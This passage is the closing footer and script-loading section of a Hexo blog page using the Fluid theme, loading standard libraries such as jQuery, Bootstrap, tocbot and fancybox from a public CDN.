       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>








  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
